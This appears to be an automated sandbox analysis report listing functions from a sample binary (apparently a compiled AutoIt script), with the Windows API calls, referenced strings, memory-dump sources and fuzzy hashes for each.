Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 6CB092B684020CB7CE012A92EC02F897B599B417A4F408020FB0C18162A673A6A49A89

Function 014E772C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 014E7741

Memory Dump Source

Source File: 00000000.00000002.1354881625.00000000014E5000.00000040.00000020.00020000.00000000.sdmp, Offset: 014E5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e5000_MBOaS3GRtF.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 9a4a55c3aad5f74f9baedb0d269153f0bcb11a7c2d9e6c9cbc8c14c05dc59eef
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 81E09A7498010EAFDB00EFA4DA496AE7BB4EF04312F1005A1FD0596691DA309A548A62

Function 014E7730 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 014E7741

Memory Dump Source

Source File: 00000000.00000002.1354881625.00000000014E5000.00000040.00000020.00020000.00000000.sdmp, Offset: 014E5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e5000_MBOaS3GRtF.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 47343d0c8e08d3f5a49f0e20908e78d6e7af23be1e960eefa3db281b806aec67
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 98E0BF7498010E9FDB00EFA4DA496AE7BB4EF04302F100161FD0192281D63099508A62

Non-executed Functions

Function 00B2CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B2CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B2CB95
GetWindowLongW.USER32(?,000000F0), ref: 00B2CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B2CC00
SendMessageW.USER32 ref: 00B2CC29
_wcsncpy.LIBCMT ref: 00B2CC95
GetKeyState.USER32(00000011), ref: 00B2CCB6
GetKeyState.USER32(00000009), ref: 00B2CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B2CCD9
GetKeyState.USER32(00000010), ref: 00B2CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B2CD0C
SendMessageW.USER32 ref: 00B2CD33
SendMessageW.USER32(?,00001030,?,00B2B348), ref: 00B2CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B2CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B2CE60
SetCapture.USER32(?), ref: 00B2CE69
ClientToScreen.USER32(?,?), ref: 00B2CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B2CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B2CEF5
ReleaseCapture.USER32 ref: 00B2CF00
GetCursorPos.USER32(?), ref: 00B2CF3A
ScreenToClient.USER32(?,?), ref: 00B2CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B2CFA3
SendMessageW.USER32 ref: 00B2CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B2D00E
SendMessageW.USER32 ref: 00B2D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B2D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B2D06D
GetCursorPos.USER32(?), ref: 00B2D08D
ScreenToClient.USER32(?,?), ref: 00B2D09A
GetParent.USER32(?), ref: 00B2D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B2D123
SendMessageW.USER32 ref: 00B2D154
ClientToScreen.USER32(?,?), ref: 00B2D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B2D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B2D20C
SendMessageW.USER32 ref: 00B2D22F
ClientToScreen.USER32(?,?), ref: 00B2D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B2D2B5

Part of subcall function 00AA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AA25EC

GetWindowLongW.USER32(?,000000F0), ref: 00B2D351

Strings

@GUI_DRAGID, xrefs: 00B2CE9C
F, xrefs: 00B2D235

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: efef3cd2e9c3a1c669ab92dd6c29afd6d326f26c5c62dc3dfdedaa12b56777b7
Instruction ID: bf80844beefc036e35e3be61af5d3f6c3f3b259369a8800ed43227fd0296117e
Opcode Fuzzy Hash: efef3cd2e9c3a1c669ab92dd6c29afd6d326f26c5c62dc3dfdedaa12b56777b7
Instruction Fuzzy Hash: 9F42AF34104295AFD721CF24E888EAABFF5FF49310F1409A9F599872B0CB71D855DB92

Function 00AB6F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AB71C3
_memset.LIBCMT ref: 00AB7539
_memmove.LIBCMT ref: 00AB76AC

Strings

[:>:]], xrefs: 00AB7492
[:<:]], xrefs: 00AB7479
Q\E, xrefs: 00AB7FCB
DEFINE, xrefs: 00AF2103
\b(?=\w), xrefs: 00AF3769
\b(?<=\w), xrefs: 00AF3773

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: 823dfb2245549f9235f71f01315aa7d78edf571897e2cbf830b91deee8e49970
Instruction ID: ad3ddadd146649f6bfc0b8d1a6eaed4f8f35779627d5c8e93fd7068e0fdb4994
Opcode Fuzzy Hash: 823dfb2245549f9235f71f01315aa7d78edf571897e2cbf830b91deee8e49970
Instruction Fuzzy Hash: 47938F75A04219DBDF24CF98C891BFDB7B1FF48310F25816AEA55AB281E7749E81CB40

Function 00AA48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00AA48DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00ADD665
IsIconic.USER32(?), ref: 00ADD66E
ShowWindow.USER32(?,00000009), ref: 00ADD67B
SetForegroundWindow.USER32(?), ref: 00ADD685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00ADD69B
GetCurrentThreadId.KERNEL32 ref: 00ADD6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADD6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00ADD6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 00ADD6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 00ADD6CF
SetForegroundWindow.USER32(?), ref: 00ADD6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADD6E7
keybd_event.USER32(00000012,00000000), ref: 00ADD6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADD6FC
keybd_event.USER32(00000012,00000000), ref: 00ADD701
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADD70A
keybd_event.USER32(00000012,00000000), ref: 00ADD70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADD719
keybd_event.USER32(00000012,00000000), ref: 00ADD71E
SetForegroundWindow.USER32(?), ref: 00ADD721
AttachThreadInput.USER32(?,?,00000000), ref: 00ADD748

Strings

Shell_TrayWnd, xrefs: 00ADD660

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: f7d672d51bed06715436e9e46d0cb31891d3211162b5efc927b1e2a658fdecd7
Instruction ID: 18844e6f89f905c90aa9ee421b13c869647fe6db83114e14e74de946082b5bd7
Opcode Fuzzy Hash: f7d672d51bed06715436e9e46d0cb31891d3211162b5efc927b1e2a658fdecd7
Instruction Fuzzy Hash: 4F315071A40318BAEB316BA19C49F7F7E7CEB44B50F104076FA05EB1D1CAB45D12AAA1

Function 00AF8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00AF87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF882B
Part of subcall function 00AF87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF8858
Part of subcall function 00AF87E1: GetLastError.KERNEL32 ref: 00AF8865

_memset.LIBCMT ref: 00AF8353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00AF83A5
CloseHandle.KERNEL32(?), ref: 00AF83B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AF83CD
GetProcessWindowStation.USER32 ref: 00AF83E6
SetProcessWindowStation.USER32(00000000), ref: 00AF83F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AF840A

Part of subcall function 00AF81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AF8309), ref: 00AF81E0
Part of subcall function 00AF81CB: CloseHandle.KERNEL32(?,?,00AF8309), ref: 00AF81F2

Strings

default, xrefs: 00AF8405
winsta0, xrefs: 00AF83C8
, xrefs: 00AF8362

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 9f13f1b292259542edb093d455a8fc2c9d370c2ca59f43763d971d53061a4fa4
Instruction ID: 976ee06e44df8d7dffa5dc0a2ad7690c72d2e322976f64ccb100319609573a72
Opcode Fuzzy Hash: 9f13f1b292259542edb093d455a8fc2c9d370c2ca59f43763d971d53061a4fa4
Instruction Fuzzy Hash: 0C81587190020DAFDF219FE4DD45AFEBBB9EF08704F144169FA10A6261DB398E19DB60

Function 00B0C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B0C78D
FindClose.KERNEL32(00000000), ref: 00B0C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B0C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B0C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B0C844
__swprintf.LIBCMT ref: 00B0C890
__swprintf.LIBCMT ref: 00B0C8D3

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

__swprintf.LIBCMT ref: 00B0C927

Part of subcall function 00AC3698: __woutput_l.LIBCMT ref: 00AC36F1

__swprintf.LIBCMT ref: 00B0C975

Part of subcall function 00AC3698: __flsbuf.LIBCMT ref: 00AC3713
Part of subcall function 00AC3698: __flsbuf.LIBCMT ref: 00AC372B

__swprintf.LIBCMT ref: 00B0C9C4
__swprintf.LIBCMT ref: 00B0CA13
__swprintf.LIBCMT ref: 00B0CA62

Strings

%02d, xrefs: 00B0C91B, 00B0C925, 00B0C973, 00B0C9C2, 00B0CA11, 00B0CA60
%4d, xrefs: 00B0C8CD
%4d%02d%02d%02d%02d%02d, xrefs: 00B0C88A

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: b50d76698582489915afb9f2d769e21140ebf4a4391fd6a5269151426ed8782d
Instruction ID: de9d7b22435b2511ee52ac21f33c4916a8029959aa0086d7321a09783529feae
Opcode Fuzzy Hash: b50d76698582489915afb9f2d769e21140ebf4a4391fd6a5269151426ed8782d
Instruction Fuzzy Hash: 91A109B2508305ABC710EBA4C985EAFB7ECEF99700F40492DF58587191EB34DA08CB62

Function 00B0EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00B0EFB6
_wcscmp.LIBCMT ref: 00B0EFCB
_wcscmp.LIBCMT ref: 00B0EFE2
GetFileAttributesW.KERNEL32(?), ref: 00B0EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 00B0F00E
FindNextFileW.KERNEL32(00000000,?), ref: 00B0F026
FindClose.KERNEL32(00000000), ref: 00B0F031
FindFirstFileW.KERNEL32(*.*,?), ref: 00B0F04D
_wcscmp.LIBCMT ref: 00B0F074
_wcscmp.LIBCMT ref: 00B0F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 00B0F09D
SetCurrentDirectoryW.KERNEL32(00B58920), ref: 00B0F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0F0C5
FindClose.KERNEL32(00000000), ref: 00B0F0D2
FindClose.KERNEL32(00000000), ref: 00B0F0E4

Strings

*.*, xrefs: 00B0F048

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 17abd0933ed74be6b4ac098143b3cdd076ddc156b61f1cf073f1078a48a434e4
Instruction ID: 8d7e404dc83a91b47f16fc20f3d4e7eb4dc1ba13d24b8790ee0a8985b0d08edf
Opcode Fuzzy Hash: 17abd0933ed74be6b4ac098143b3cdd076ddc156b61f1cf073f1078a48a434e4
Instruction Fuzzy Hash: 0C31A23260121A6ADB24AFA4DC49AFE7BEDDF49360F1041B5E805E30E1EF70DA45CA55

Function 00B20857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B20953
RegCreateKeyExW.ADVAPI32(?,?,00000000,00B2F910,00000000,?,00000000,?,?), ref: 00B209C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B20A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B20A92
RegCloseKey.ADVAPI32(?), ref: 00B20DB2
RegCloseKey.ADVAPI32(00000000), ref: 00B20DBF

Strings

REG_DWORD, xrefs: 00B20C83
REG_MULTI_SZ, xrefs: 00B20B7A
REG_QWORD, xrefs: 00B20D00
REG_EXPAND_SZ, xrefs: 00B20A2F
REG_SZ, xrefs: 00B20AD0
REG_BINARY, xrefs: 00B20D4D

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: af2944b5cba60b85cd6ebc28ca90bc3323cfb1dc9f4d92af3440f663fd7b3c1c
Instruction ID: b3f86b5f3d171eebd6fe32629d798e3813798715cb9da6628e1671e918933daf
Opcode Fuzzy Hash: af2944b5cba60b85cd6ebc28ca90bc3323cfb1dc9f4d92af3440f663fd7b3c1c
Instruction Fuzzy Hash: 590239756006119FCB14EF14D985E2BB7E5EF8A314F0485ACF89A9B2A2DB34ED41CB81

Function 00B0F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00B0F113
_wcscmp.LIBCMT ref: 00B0F128
_wcscmp.LIBCMT ref: 00B0F13F

Part of subcall function 00B04385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B043A0

FindNextFileW.KERNEL32(00000000,?), ref: 00B0F16E
FindClose.KERNEL32(00000000), ref: 00B0F179
FindFirstFileW.KERNEL32(*.*,?), ref: 00B0F195
_wcscmp.LIBCMT ref: 00B0F1BC
_wcscmp.LIBCMT ref: 00B0F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 00B0F1E5
SetCurrentDirectoryW.KERNEL32(00B58920), ref: 00B0F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0F20D
FindClose.KERNEL32(00000000), ref: 00B0F21A
FindClose.KERNEL32(00000000), ref: 00B0F22C

Strings

*.*, xrefs: 00B0F190

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: c7016b03949c9190eaca42f1930a7b6be18fe4eb0d2ef43efcc66a550f4a761f
Instruction ID: 9316b2c9e251022c86626fdfb63c6ff9f1382bc4421da610704c495623764882
Opcode Fuzzy Hash: c7016b03949c9190eaca42f1930a7b6be18fe4eb0d2ef43efcc66a550f4a761f
Instruction Fuzzy Hash: 52316F3660021ABADB30AEA4EC49EFE7BEC9F45360F1441F5F804A24E1DA30DA45CA54

Function 00B0A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B0A20F
__swprintf.LIBCMT ref: 00B0A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 00B0A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B0A293
_memset.LIBCMT ref: 00B0A2B2
_wcsncpy.LIBCMT ref: 00B0A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B0A323
CloseHandle.KERNEL32(00000000), ref: 00B0A32E
RemoveDirectoryW.KERNEL32(?), ref: 00B0A337
CloseHandle.KERNEL32(00000000), ref: 00B0A341

Strings

\??\%s, xrefs: 00B0A22B
\, xrefs: 00B0A247
:, xrefs: 00B0A252

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 909c91f05502d6a9b5fd7b25a4805edd2f023fb2f5e4b6b5a1ec360d4a7b41ba
Instruction ID: 9d9bb347086c08a0962a5edeeb8b157d06c9c47673e56a36335fca3fbaa036cc
Opcode Fuzzy Hash: 909c91f05502d6a9b5fd7b25a4805edd2f023fb2f5e4b6b5a1ec360d4a7b41ba
Instruction Fuzzy Hash: 7631C67250020AABDB21DFA0DC49FFB77BCEF89740F1041B6F509D21A0EB7096458B29

Function 00AF7CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AF821E
Part of subcall function 00AF8202: GetLastError.KERNEL32(?,00AF7CE2,?,?,?), ref: 00AF8228
Part of subcall function 00AF8202: GetProcessHeap.KERNEL32(00000008,?,?,00AF7CE2,?,?,?), ref: 00AF8237
Part of subcall function 00AF8202: HeapAlloc.KERNEL32(00000000,?,00AF7CE2,?,?,?), ref: 00AF823E
Part of subcall function 00AF8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AF8255

Part of subcall function 00AF829F: GetProcessHeap.KERNEL32(00000008,00AF7CF8,00000000,00000000,?,00AF7CF8,?), ref: 00AF82AB
Part of subcall function 00AF829F: HeapAlloc.KERNEL32(00000000,?,00AF7CF8,?), ref: 00AF82B2
Part of subcall function 00AF829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AF7CF8,?), ref: 00AF82C3

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AF7D13
_memset.LIBCMT ref: 00AF7D28
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AF7D47
GetLengthSid.ADVAPI32(?), ref: 00AF7D58
GetAce.ADVAPI32(?,00000000,?), ref: 00AF7D95
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AF7DB1
GetLengthSid.ADVAPI32(?), ref: 00AF7DCE
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AF7DDD
HeapAlloc.KERNEL32(00000000), ref: 00AF7DE4
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AF7E05
CopySid.ADVAPI32(00000000), ref: 00AF7E0C
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AF7E3D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AF7E63
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AF7E77

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 7d759e3e1b25185ac518b3a272655d4bc55e5288f3771d3d6c382793feb9b172
Instruction ID: 178a19e35cea7a4de116e71ec287aea250efec41021840b9c0acec22168355cd
Opcode Fuzzy Hash: 7d759e3e1b25185ac518b3a272655d4bc55e5288f3771d3d6c382793feb9b172
Instruction Fuzzy Hash: 7D612B7190420AAFDF119FA4DC45EFEBB79FF04700F04826AFA15A7291DB359A16CB60

Function 00AB66E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON

Download Yara Rule

Strings

BSR_UNICODE), xrefs: 00AF1338
BSR_ANYCRLF), xrefs: 00AF131E
NO_AUTO_POSSESS), xrefs: 00AF112E
ANY), xrefs: 00AF12DE
UTF), xrefs: 00AF10FA
UTF16), xrefs: 00AF10CF
LIMIT_RECURSION=, xrefs: 00AF11FC
NO_START_OPT), xrefs: 00AF114F
CR), xrefs: 00AF1287
